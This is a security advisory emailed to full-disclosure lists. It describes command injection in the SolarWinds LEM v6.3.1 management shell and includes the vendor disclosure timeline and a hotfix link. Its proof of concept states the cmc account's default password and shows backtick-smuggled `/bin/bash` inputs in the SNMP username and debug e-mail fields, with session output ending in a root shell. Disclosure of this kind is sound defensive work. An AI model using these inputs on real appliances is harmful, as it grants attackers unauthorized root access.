KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection

--91uuQnVgaNHArbETh6PAFWc3Ai1cX4rLV
Content-Type: multipart/mixed; boundary="uD5FaWKferWS1qMRepUhwlq806V0CgXLU";
 protected-headers="v1"
From: KoreLogic Disclosures <disclosures@korelogic.com>
To: fulldisclosure@seclists.org, bugtraq@securityfocus.com
Message-ID: <8705e2a5-c75a-783f-c6c4-f77d67a8935d@korelogic.com>
Subject: KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command
 Injection

--uD5FaWKferWS1qMRepUhwlq806V0CgXLU
Content-Type: text/plain; charset=utf-8
Content-Language: en-US
Content-Transfer-Encoding: quoted-printable

KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Inje=
ction

Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-20=
17-007.txt


1. Vulnerability Details

     Affected Vendor: Solarwinds
     Affected Product: Log and Event Manager Virtual Appliance
     Affected Version: v6.3.1
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special
                         Elements used in an OS Command
     Impact: Privileged Access
     Attack vector: SSH

2. Vulnerability Description

     Insufficient input validation in the management interface can
     be leveraged in order to execute arbitrary commands. This can
     lead to (root) shell access to the underlying operating system.

3. Technical Description

     Should an attacker gain access to the SSH console for the
     cmc user, root access to the underlying operating system can be
     achieved. The default password for the cmc user is "password".

     This report details two distinct attack vectors: the username
     input during SNMP setup and the destination email input
     during debug.

   =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
   =3D SNMP     =3D
   =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

     This is accomplished by placing `/bin/bash` in the username
     input during SNMP server setup.

     $ ssh cmc@1.3.3.7
     Password:
     Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_=
64
     Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
       //////////////////////////////////////////////////
       ///       SolarWinds Log & Event Manager       ///
       ///                   management console       ///
       //////////////////////////////////////////////////

     Detected VMware Virtual Platform
     Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
     Available commands:
       [ appliance ]  Network, System
       [ manager ]    Upgrade, Debug
       [ service ]    Restrictions, SSH, Snort
       [ ndepth ]     nDepth Configuration/Maintenance
         upgrade      Upgrade this Appliance
         admin        Run Admin UI (for better usability browse https://1=
=2E3.3.7/mvc/configuration)
         import       Import a file that can be used from the Admin UI
         help         display this help
         exit         Exit
     cmc > service
     Available commands:
         startssh           Start the SSH Service
         stopssh            Stop the SSH Service
         restartssh         Restart the SSH Service
         restrictssh        Restrict Access to the SSH Service (by IP Add=
ress/hostname)
         unrestrictssh      Remove Restrictions on Access to the SSH Serv=
ice
         snmp               Configure the SNMP Services
         copysnortrules     Copy Snort rules to floppy or network share
         loadsnortrules     Load Snort rules from floppy or network share=

         loadsnortbackup    Load Snort rules from backup
         restartsnort       Restart the Snort Service
         enableflow         * Enable the flow Collection Service
         disableflow        Disable the flow Collection Service
         restrictconsole    Restrict Access to the Manager Console (GUI) =
by IP/hostname
         unrestrictconsole  Remove Restrictions on Access to the Console =
(GUI)
         restrictreports    Restrict Access to Reports by IP/hostname
         unrestrictreports  Remove Restrictions on Access to Reports
         stopopsec          Stop all running OPSEC LEA client connections=

         help               display this help
         exit               Return to main menu

         NOTE: Commands with an asterisk (*) include an automatic manager=
 service restart
     cmc::service > snmp
     SNMP Trap Logging Service is RUNNNING
     Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

     SNMP Request Service is RUNNNING
     Would you like to STOP the SNMP Request Service? [Y/n] Y

     The SNMP Trap Logging Service is stopped.
     The SNMP Request Service is stopped.
     cmc::service > snmp
     SNMP Trap Logging Service is DISABLED
     Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

     SNMP Request Service is DISABLED
     Would you like to ENABLE the SNMP Request Service? [Y/n] Y

     Enter the port number to access SNMP on LEM (default: 161):
     Enter the username to access SNMP on LEM (default: orion): `/bin/bas=
h`
     Enter the password hashing algorithm (SHA1, MD5 or NO for no authent=
ication, default: SHA1):
     Enter the authentication password (default: orion123):
     Enter the communication encryption algorithm (AES128, DES56 or NO fo=
r no encryption, default: AES128):
     Enter the encryption key (default: orion123):

     cmc@swi-lem:/usr/local/contego$


   =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
   =3D Debug    =3D
   =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D

     This is accomplished by placing `/bin/bash` in the destination
     email input during debug.

     $ ssh cmc@1.3.3.7
     Password:
     Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_=
64
     Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
       //////////////////////////////////////////////////
       ///       SolarWinds Log & Event Manager       ///
       ///                   management console       ///
       //////////////////////////////////////////////////

     Detected VMware Virtual Platform
     Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
     Available commands:
       [ appliance ]  Network, System
       [ manager ]    Upgrade, Debug
       [ service ]    Restrictions, SSH, Snort
       [ ndepth ]     nDepth Configuration/Maintenance
         upgrade      Upgrade this Appliance
         admin        Run Admin UI (for better usability browse https://1=
=2E3.3.7/mvc/configuration)
         import       Import a file that can be used from the Admin UI
         help         display this help
         exit         Exit
     cmc > manager
     Available commands:
         actortoolupgrade   * Upgrade your Managers Actor Tools (CD/flop=
py)
         archiveconfig      Set your Manager Database Archive Schedule/Se=
ttings
         backupconfig       Set your Manager Backup Schedule/Settings
         cleanagentconfig   Reconfigure the agent on this box to a new ma=
nager
         configurendepth    * Configure the manager to use an nDepth serv=
er.
         confselfsignedcert * Configure the manager to use a self signed =
certificate
         dbrestart          Restart database
         debug              Send Debugging Information to an Alternate Ad=
dress
         disabletls         Disable TLS for DB connections
         enabletls          Enable TLS for DB connections
         exportcert         Export the CA certificate for console
         exportcertrequest  Export a certificate request for signing by C=
A
         hotfix             Install LEM hotfix.
         importcert         * Import a certificate used for console commu=
nication
         importl4ca         * Import a CA of the other node in L4 configu=
ration
         licenseupgrade     * Upgrade your Manager License (CD/floppy/net=
work)
         logbackupconfig    Set your Manager Log Backup Schedule/Settings=

         resetadmin         Reset the "admin" user password to default
         restart            * Restart Manager Service
         sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (=
CD/floppy)
         showlog            Show Manager Log File
         showmanagermem     Show the memory setting of SolarWinds manager=

         start              Start Manager Service
         stop               * Stop Manager Service
         support            Send Debugging Information to Tech Support @t=
rigeo.com
         togglehttp         * Enable or disable HTTP (port 80).
         viewsysinfo        Show information about machine and SolarWinds=
 manager
         watchlog           Watch Manager Log File
         exit               Return to main menu

         NOTE: Commands with an asterisk (*) include an automatic manager=
 service restart
     cmc::manager > debug
     Press <enter> to capture debugging information
     You will need to provide an SMTP server or Windows File Sharing Cred=
entials

     Collecting general system information......UpdateInfo failed: VMware=
 Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     UpdateInfo failed: VMware Guest API is not enabled on the host
     .e.sudo: unable to resolve host swi-lem
     sudo: unable to resolve host swi-lem
     .cat: /etc/hosts: No such file or directory
      done.
     sudo: unable to resolve host swi-lem
     E-Mail/Network share/Quit? (e/n/q) e
     E-Mail/Network share/Quit? (e/n/q) e
     Please enter the e-mail recipient:
        (e.g. support@trigeo.com)
     > `/bin/bash >&2`
     Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
     Please enter the name this message should appear from
        (e.g. Someone Important)
     > Test
     Is the name Test correct? <Y/n> Y
     Please enter the e-mail address this message should appear from
        (e.g. someone@trigeo.com)
     > fake@localhost
     Is the e-mail address fake@localhost correct? <Y/n> Y
     Please enter the SMTP server you wish to send mail through
        (e.g. smtp.yournetwork.com)
     > 127.0.0.1
     Is the SMTP server 127.0.0.1 correct? <Y/n> Y
     Please enter the name of your company
        (e.g. Initech, Post Falls branch or Veridian Dynamics)
     > Test
     Is the company Test correct? <Y/n> Y
     Please enter a phone number where you can be reached
        (e.g. 509.555.1234)
     > Test
     Is the number Test correct? <Y/n> Y

     --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
     /tmp # id
     uid=3D0(root) gid=3D0(root) groups=3D0(root)
     --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--

4. Mitigation and Remediation Recommendation

     The vendor has released a Hotfix to remediate this
     vulnerability. Hotfix and installation instructions are
     available at:

     https://thwack.solarwinds.com/thread/111223

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     and Hank Leininger of KoreLogic, Inc.

6. Disclosure Timeline

     2017.02.16 - KoreLogic sends vulnerability report and PoC to
                  Solarwinds <psirt@solarwinds.com> using PGP key
                  with fingerprint
                  A86E 0CF6 9665 0C8C 8A7C  C9BA B373 8E9F 951F 918F.
     2017.02.20 - Solarwinds replies that the key is no longer in
                  use, requests alternate communication channel.
     2017.02.22 - KoreLogic submits vulnerability report and PoC to
                  alternate Solarwinds contact.
     2017.02.23 - Solarwinds confirms receipt of vulnerability
                  report.
     2017.04.06 - 30 business days have elapsed since Solarwinds
                  acknowledged receipt of vulnerability details.
     2017.04.11 - Solarwinds releases hotfix and public disclosure.
     2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

     See 3. Technical Description


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Polic=
y.v2.2.txt


--uD5FaWKferWS1qMRepUhwlq806V0CgXLU--

--91uuQnVgaNHArbETh6PAFWc3Ai1cX4rLV
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlj+ZZUaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQw2oAf8CZJZfSGN/e9uJFDztLvp
aUNiDoLkNhZ20hIsDoOv1P3hr77RjpO0+DuBV0DGzKLduZ65IK4GKHxsEiOBHWhP
Os2oVAMlGMcSUiX0/VAw+/scF9L7lWCFvS0qXbe6AA7dCWd8DLq76OwJXn43H7+r
UWk0fGnbXRUesdYEk4vsC1hm7o4rIcWzVzXHZwhu67aocVTyG8vfp/zCWG8FFtGq
tY3vafqYvhhXt3RZY4ToyBKftN+7zIEQ9vp4/7vfs4agb9QEAUdd+r908Lh5/juL
o+ruvG86gfo5aDNLaDj4mmzJy9ujGFkKnkrUfiwK/ncaOJZSSB4kh4Bmfp8ktW/G
GQ==
=n2/N
-----END PGP SIGNATURE-----

--91uuQnVgaNHArbETh6PAFWc3Ai1cX4rLV--